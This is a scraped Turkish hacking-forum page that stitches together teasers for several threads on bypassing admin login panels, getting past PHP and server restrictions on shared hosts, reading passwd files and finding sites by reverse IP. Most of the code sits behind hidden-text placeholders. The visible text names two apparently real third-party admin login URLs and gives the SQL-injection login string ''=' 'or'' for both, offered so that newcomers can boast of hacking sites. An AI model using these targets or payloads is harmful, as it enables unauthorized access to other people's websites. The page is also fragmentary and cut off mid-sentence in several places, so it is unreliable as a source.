Login Panelleri'nin Alayı Bypass
Selamun Aleyküm Millet Sizler için halen geçerliliğini koruyan bir login bypass yöntemini videolu olarak anlattım.
Açığın mantığı Admin Panelden Giriş yaprken her türlü panelde Login.php den İndex.php ye yönlendirmesi var ise bu Bypass yöntemini...
sivaslılardan özür diliyorum :D yorum atmassanız siteleri göremessiniz
*** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***[/hide]
PHP'nin birkaç sürümü hariç 5.x ve üzeri sürümlerin hepsinde bypass edilebilirlik tespit edildi. Tespiti yapan ise tabiki Cpanel kuruluşu, muhtemelen pentester ekipleri tarafından tespit ediliyor ancak açığını veya exploit edilebilirlik durumunu paylaşıma sunmuyorlar doğal olarakta php.net'e...
aşağıda verdiğim kodları xx.php olarak oluşturun ve dizine geçiş yapın. Zaten orada yapmanız gereken otomatik olarak söylenecek :)
Bol şanslar !
*** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
Submit komutunu uyguladıktan sonra bir süre bekleyiniz.
Kolay gelsin.
*** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
arasında boşluk olan her biri tek komuttur. iyi şanslar !
*** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
arkadaşlar biliyorum biraz eski ama umarım hala iş görüyordur. iyi şanslar !
*** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
*** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ****** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
Selamun aleyküm. Forumda olmadığını gördüm , benimde katkımın olmasını istedim :)
*** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
Bi işe yaramaz fakat yeniler arkadaş ortamında ğaaa site hekledim diye dolaşabilir şahsen ben yapmıştım :D
1:http://gerfotos.servernet.net.br/xodozinha/galeria/admin1/login.php
Username: '=' 'or'
Pass: '=' 'or'
2:http://meginews.com/Fuwaada/admin1/login.php
Username: '=' 'or'
Pass: '=' 'or'...
Selamün Aleyküm Arkadaşlar,
Birinci Dökümanımızda Serverdaki Tüm Siteleri Görme Adlı Makalemizi Yayınlamıştık.
Konu Linki:Tıkla Bana
Bu Makalemizde İste passwd Okuma Ve Basit Olarak Server Bypasslamayı Anlatmaya Çalışacağım Arkadaşlar. Umarım Yararlı Bir Döküman Olur. Uzatmadan Konumuza Geçelim...
Öncelikle Selamün Aleyküm Arkadaşlar,
Birkaç Dostumuzla Oturduk ve Böyle Bir Döküman Hazırlama Kararı Aldık. Basitten Zora Doğru Elimizden Geldiğince Bu Kategoride Bildiklerimizi Anlatacağız. Kısa Keselim Ve Konumuza Geçelim.
Coğu Arkadaşımız Reverse İp Yaparak Serverdaki Siteleri Görmeye...
Arkadaşlar Çok Etkilidir Çekemediğim çoğu yerde kullanmaktayım başkaları da yararlansın diye yavaş yavaş paylaşıyorum güle güle kullanın
LİNK: http://www.dosyaupload.com/Otm
CloudFlare Nedir?
“CloudFlare, milyonlarca web sitesini, API’leri, SaaS hizmetlerini ve İnternet’e bağlı diğer özellikleri hızlandırır ve korur.”
Cloudflare, kullanıcısına; CDN ve Web Optimizasyonu gibi performans iyileştirmeleri, WAF, DDOS ve SSL tehditlerine karşı güvenlik koruması...